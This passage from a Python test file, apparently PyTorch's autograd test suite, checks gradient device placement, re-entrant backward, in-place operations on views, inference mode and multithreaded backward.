t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.testing.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
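# Note: calling .backward() inside Function.backward() makes the autograd
# engine re-entrant; the three cases below exercise re-entrant backward calls
# that start and finish on different combinations of CPU/GPU worker threads.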
# Reentrant starts on GPU thread, finishes on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishes on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
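# Why [[2, 2], [1, 1]]: the in-place mul_ on the narrow()ed view rewrites the
# history of the base `x` (internally a CopySlices node in the graph), so
# backward sees that the first row of x is 2 * the first row of root, giving
# gradient 2 there and 1 everywhere else.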
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastable shapes and scalars.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
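# A minimal usage sketch mirroring the checks above (f and x are placeholders):
#   with torch.inference_mode():
#       y = f(x)                      # runs with inference mode enabled
#       with torch.inference_mode(False):
#           z = f(x)                  # normal autograd mode again
# inference_mode() also works as a decorator, as the next test shows.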
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
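# Mechanism: `out = a * a` saved `a` (and its version counter) for backward
# outside inference mode; the later a.add_(2) bumps a's version even though it
# runs inside inference mode, so backward detects the mismatch and raises.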
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces an inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing an inplace operation, the tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a view operation produces an inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
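# (mul, unlike the add above, needs to save `c` to compute the gradient
# w.r.t. `s`, and inference tensors cannot be saved for backward)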
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument, so there is no mixed inference/normal
# tensor input scenario for view ops here
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since it is equivalent to s.view(c.sizes()), which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
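# Each spawned thread simply calls fn(*args); passing a shared tensor through
# `args` (as several tests below do) makes all threads race on the same
# autograd graph, which is exactly what these tests want to exercise.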
def test_simple_backward(self):
# simple multithreaded backward that creates threads at the beginning of training;
# everything else (inputs, operations, etc.) is separate per thread
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
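# dy/dx = 0.5 * ((x + 4) + (x + 3)) = x + 3.5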
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (this is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we call backward concurrently from multiple threads and all
# threads share the same input, the different backward calls all
# accumulate into the same .grad for each input, so the accumulated
# gradient should equal num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use the functional grad() API, gradients are not
# accumulated into .grad; each call should return the same value
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# A user might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is shared across
# different threads and we need to ensure the user specifies retain_graph=True,
# otherwise we error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should raise an error in some threads because retain_graph is not set.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will succeed in this case; all other threads should raise
# an error recommending that the user specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# the accumulated result should equal num_threads * gradient
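# Derivation: each thread receives u = x + x ** 2 and computes y = u + u ** 2,
# so dy/dx = (1 + 2 * u) * (1 + 2 * x) = 4 * x ** 3 + 6 * x ** 2 + 4 * x + 1,
# and the 5 threads accumulate 5 copies of that into x_retain.grad.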
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
